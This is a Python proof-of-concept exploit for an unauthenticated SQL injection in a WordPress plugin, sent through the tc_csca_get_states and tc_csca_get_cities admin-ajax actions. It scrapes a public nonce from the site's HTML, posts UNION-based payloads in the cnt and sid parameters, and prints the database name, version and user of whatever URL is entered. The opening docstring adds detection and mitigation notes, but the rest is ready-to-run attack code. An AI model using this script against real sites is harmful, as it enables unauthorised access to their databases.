"""Proof-of-concept for an unauthenticated SQL injection reachable through two
WordPress admin-ajax actions (``tc_csca_get_states`` / ``tc_csca_get_cities``).

Flow, as implemented below:
  1. GET the site root and scrape an AJAX nonce out of the inlined
     ``tc_csca_auto_ajax`` JavaScript object with a regex.
  2. POST each action to ``/wp-admin/admin-ajax.php`` with a UNION-based
     payload in the ``cnt`` / ``sid`` parameter.
  3. Parse the JSON reply and print the first ``id`` field that starts with
     ``database`` (the payload's SELECT produces that prefix, see ``exploit``).

Defender notes (derived from what this script sends, not from any external
reference):
  * The nonce is scraped from publicly served HTML, so the ``nonce_ajax``
    check does not stop an anonymous caller -- WordPress nonces are a CSRF
    control, not an authorisation or input-validation control.
  * Detection: a POST to ``admin-ajax.php`` whose ``action`` is one of the two
    above and whose ``cnt`` or ``sid`` value is non-numeric (here it contains
    ``union select``) should never occur from the plugin's own front-end.
  * Mitigation on the server side is to cast ``cnt`` / ``sid`` to an integer
    before they reach the query (or pass them through ``$wpdb->prepare``).
  * TLS certificate verification is disabled for every request (``verify=False``),
    so the script itself is also exposed to interception on the wire.
"""
import requests as req
import re
import json
from urllib3.exceptions import InsecureRequestWarning

# Silence the per-request warning that verify=False would otherwise emit.
req.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


def extract(text):
    """Print the first injected result found in an admin-ajax JSON reply.

    Args:
        text: Raw response body. It is expected to be a JSON array of objects
            that each carry an ``id`` key (presumably the plugin's normal
            state/city rows) -- the code indexes ``info['id']`` unconditionally,
            so any other shape raises ``KeyError`` / ``TypeError``.

    Side effects:
        Prints the matching ``id`` to stdout; prints nothing if no element
        starts with ``database``.
    """
    for info in json.loads(text):
        # The UNION payload in ``exploit`` selects a string that begins with
        # the literal "database:", so this prefix identifies the injected row
        # among the legitimate ones.
        if info['id'].startswith("database"):
            print(info['id'])
            break


def exploit(url,nonce):
    """Send the injection payload to both vulnerable actions and print results.

    Args:
        url: Site base URL without a trailing slash (``/wp-admin/...`` is
            appended verbatim).
        nonce: Value scraped from the page's ``tc_csca_auto_ajax`` object;
            sent back as ``nonce_ajax``.

    The hex literals in the payload decode to the ASCII strings
    ``database:``, ``|version:`` and ``|user:``; they are only labels that
    make the concatenated SELECT output self-describing for ``extract``.
    Both requests skip TLS verification.
    """
    payloads = [
        {"action":"tc_csca_get_states","nonce_ajax":nonce,"cnt":"1 or 0 union select concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3-- -"}
        ,{"action":"tc_csca_get_cities","nonce_ajax":nonce,"sid":"1 or 0 union select concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3-- -"}
    ]
    for payload in payloads:
        print("Exploit with action: "+payload['action'])
        # Form-encoded POST; a non-2xx status is not checked, so a blocked or
        # errored request falls through to extract() with whatever body came back.
        resp = req.post(url+"/wp-admin/admin-ajax.php", data=payload,verify=False)
        extract(resp.text)


url = input("Url(http://example.com): ")
# Greedy ``.*`` groups: assumes the object is rendered on one line with
# ``ajax_url`` before ``nonce`` and no other quoted fields in between -- TODO confirm
# against the plugin's actual inline script.
regex_nonce = 'tc_csca_auto_ajax = {"ajax_url":".*","nonce":"(.*)"}'
nonce = re.search(regex_nonce, req.get(url,verify=False).text)
# re.search returns None when the pattern is absent (plugin not installed or
# script not inlined), so the next line then raises AttributeError.
nonce= nonce.group(1)
exploit(url,nonce)